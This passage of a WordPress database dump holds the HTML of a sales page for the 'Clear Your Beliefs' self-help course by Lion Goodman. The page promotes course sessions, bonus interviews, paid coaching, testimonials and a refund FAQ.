src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:40:38', '2014-06-18 01:40:38', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(987, 2, '2014-06-17 20:38:36', '2014-06-18 01:38:36', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" 